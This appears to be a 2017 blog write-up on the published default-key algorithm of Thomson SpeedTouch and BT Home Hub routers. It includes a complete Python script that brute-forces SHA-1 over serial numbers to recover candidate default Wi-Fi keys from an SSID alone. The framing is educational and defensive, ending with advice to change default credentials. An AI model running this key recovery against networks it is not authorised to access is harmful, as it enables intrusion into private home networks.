Default password generation of BT Home Hub and Thomson routers

In 2008, the algorithm these routers use to generate their default wireless password was reverse engineered and published. Now, in June 2017, few routers on the market are still affected by that discovery, and most of the programs that derived the default password from a network's SSID have disappeared as well. Based on the information in the GNU Citizen blog post, I wrote a Java application that generates these keys. Its purpose is to let users check whether their own router is vulnerable. Even though the information was published nearly ten years ago, there are still quite a few affected routers around: last year I saw three vulnerable ones at friends of mine. Old information or not, there are still potential victims out there.

Note that this program is based on the research of Kevin Devine <wyse101[at]gmail[dot]com> which was published on March 15th 2008.

Explaining the algorithm
The only input needed is the SSID of the network. SSID stands for Service Set IDentifier, commonly referred to as the name of your Wi-Fi. The default SSID in the example is SpeedTouchF8A3D0. The last six characters of that SSID, F8A3D0, are hexadecimal: they are the last three bytes of a hash, and they are all the information we need to calculate the default password. They are also what has to be entered in the program.

The serial number of the whole device has the following format:
CP YY WW PP XXX (CC)

CP is a constant two-character prefix; it may be an abbreviation, but no further information about it is available.
YY is the year in which the router is produced.
WW is the week in which the router is produced, of the given year (YY).
PP is the production code.
XXX is the unit number of the given week (WW) in the given year (YY).
CC is the configuration code.

The string that is hashed is built from CP, YY, WW and the unit number only: PP and CC are dropped, and each character of the unit number is replaced by the two-digit hexadecimal value of its ASCII code (unit number 109 becomes 313039, giving CP0615313039 for a router from week 15 of 2006). Hashing that string with SHA-1 and writing the 20-byte digest as 40 upper-case hexadecimal characters, the first ten characters are the default password and the last six are the suffix of the SSID.

Analysing the algorithm
Neither PP nor CC take part in the calculation, so they do not have to be known. The rest of the serial number is not known either, so the password is obtained by brute force: every remaining possible serial number is hashed until one produces the SSID suffix. Not every option has to be calculated, though.

Since CP is always the same, it is a constant and does not change.
The year (YY) is always written with two digits: 2001 is written as 01.
The week (WW) uses the same notation, going from 01 up to 52.
The unit number (XXX) consists of three digits, each from 0 to 9, which gives 10 * 10 * 10 = 1000 possibilities per week. (Devine's original stkeys tool also tries the letters A to Z in these three positions, 36 * 36 * 36 = 46 656 possibilities per week; the program described here restricts itself to digits.)
The total number of combinations for a given year is therefore
CP * YY * WW * XXX
1 * 1 * 52 * 1000 = 52 000 options.

Routers are typically kept in service for a long time when the user does not need high internet throughput, which is the case for people who just browse the web and send e-mail.

While writing the program, I made one assumption: the router is no older than 01-01-2000. An older router would pre-date Windows XP, which is highly unlikely for a device still in use. The newer the model, the more likely it is to be found in the wild, so the calculation starts at the current year, 2017 at the time of writing, and works downwards. The lowest year that is calculated is 2000.

The range 2017 down to 2000 covers 18 years, so the total number of calculations is 18 * 52 000 = 936 000 SHA-1 hashes. For a modern computer this is a matter of mere seconds.

In this example only a handful of candidate keys come out, because six hexadecimal characters of the hash have to match. The BT Home Hub puts only four such characters in its SSID (for example BTHomeHub-20E3), so many more serial numbers match and the program produces far more candidate keys. Entering those keys by hand could take minutes, but a computer can try a list of them in seconds.
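To make the algorithm, the keyspace analysis and the shorter BT Home Hub suffix above concrete, here is a Python version of the same derivation. It is an added example written for this page: it is neither the Java program from the GitHub project nor Kevin Devine's stkeys. The serial number CP0615JT109 (53) is the one used as the example in the 2008 write-up; the function names, the Candidate record, the regular expression and the year range are my own choices. Two things go slightly beyond the text: the ALNUM alphabet reproduces the letters A to Z that stkeys also tries in the unit number, and the four-character BT Home Hub suffix is handled by matching the tail of the same digest, which the text implies but which I have not checked against a real BT Home Hub.

```python
"""Default WPA/WEP key derivation for Thomson SpeedTouch routers (added example)."""
import hashlib
import itertools
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

PREFIX = "CP"                                   # constant first two characters of the serial
DIGITS = "0123456789"                           # unit-number alphabet assumed on this page
ALNUM = DIGITS + "ABCDEFGHIJKLMNOPQRSTUVWXYZ"   # alphabet that Devine's stkeys tool searches

# Serial as printed on the label: CP YY WW PP XXX (CC). The (CC) part is optional.
SERIAL_RE = re.compile(r"^(CP)(\d{2})(\d{2})([A-Z0-9]{2})([A-Z0-9]{3})(?:\s*\((\d+)\))?$")


def hash_input(year: int, week: int, unit: str, prefix: str = PREFIX) -> str:
    """Build the string that is hashed: prefix, YY, WW and the unit number with each
    character replaced by the hex value of its ASCII code ('109' -> '313039').
    PP and CC take no part in it."""
    return f"{prefix}{year:02d}{week:02d}{unit.encode('ascii').hex().upper()}"


def derive(year: int, week: int, unit: str, prefix: str = PREFIX) -> Tuple[str, str]:
    """SHA-1 the string; first 10 hex digits are the key, last 6 the SSID suffix."""
    digest = hashlib.sha1(hash_input(year, week, unit, prefix).encode("ascii")).hexdigest().upper()
    return digest[:10], digest[-6:]


def derive_from_serial(serial: str) -> Tuple[str, str]:
    """Key and SSID suffix from a label serial such as 'CP0615JT109 (53)'."""
    m = SERIAL_RE.match(serial.strip().upper())
    if m is None:
        raise ValueError(f"not a CPYYWWPPXXX(CC) serial: {serial!r}")
    prefix, yy, ww, _pp, unit, _cc = m.groups()     # PP and CC are parsed but dropped
    return derive(int(yy), int(ww), unit, prefix)


@dataclass(frozen=True)
class Candidate:
    year: int
    week: int
    unit: str
    key: str


def ssid_suffix(ssid: str, length: int = 6) -> str:
    """Trailing hex characters of an SSID: 6 for SpeedTouchF8A3D0, 4 for BTHomeHub-20E3."""
    suffix = ssid.strip().upper()[-length:]
    if len(suffix) != length or not re.fullmatch(r"[0-9A-F]+", suffix):
        raise ValueError(f"SSID does not end in {length} hex characters: {ssid!r}")
    return suffix


def recover_keys(ssid: str, years: Iterable[int] = range(17, -1, -1),
                 alphabet: str = DIGITS, suffix_len: int = 6) -> List[Candidate]:
    """Hash every serial in the search space (default: 2017 down to 2000, digits only,
    18 * 52 * 1000 = 936 000 hashes) and keep those whose digest ends in the suffix."""
    suffix = ssid_suffix(ssid, suffix_len)
    hexchars = {ch: format(ord(ch), "02X") for ch in alphabet}   # ASCII code as two hex digits
    found: List[Candidate] = []
    for year in years:
        for week in range(1, 53):
            head = f"{PREFIX}{year:02d}{week:02d}"
            for unit in itertools.product(alphabet, repeat=3):
                data = head + "".join(hexchars[c] for c in unit)
                digest = hashlib.sha1(data.encode("ascii")).hexdigest().upper()
                if digest.endswith(suffix):
                    found.append(Candidate(year, week, "".join(unit), digest[:10]))
    return found


if __name__ == "__main__":
    # Constructed run: derive from the write-up's serial, then recover from the SSID alone.
    key, suffix = derive_from_serial("CP0615JT109 (53)")
    print(f"label CP0615JT109 (53) -> SSID SpeedTouch{suffix}, default key {key}")
    for cand in recover_keys(f"SpeedTouch{suffix}"):
        print(f"  CP{cand.year:02d}{cand.week:02d}??{cand.unit}  key {cand.key}")
```

Run stand-alone it first derives the key from the serial, then searches 2017 down to 2000 with nothing but the SSID, which takes a couple of seconds in CPython. Passing alphabet=ALNUM shows how the run time grows by the factor 46.656 that the letters add, and suffix_len=4 with a BTHomeHub-XXXX SSID shows how many more candidates a four-character suffix lets through.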

Conclusion
Whether obtaining the password takes seconds or minutes, the result is the same: your entire home network can be compromised in a short time.

Using the router's default SSID and password is never a good idea, whether or not the algorithm behind them is public. My advice is therefore to always change both the default password and the SSID. Giving your network a recognisable SSID has another advantage: it is easy to find in the ever-growing list of Wi-Fi networks.

Project
The project, including the source code of the program, can be found on GitHub. The Java code carries Javadoc and inline comments that explain the rest of the program.

Note that this program's only intended purpose is educational. Needless to say, illegal use is forbidden and condemned.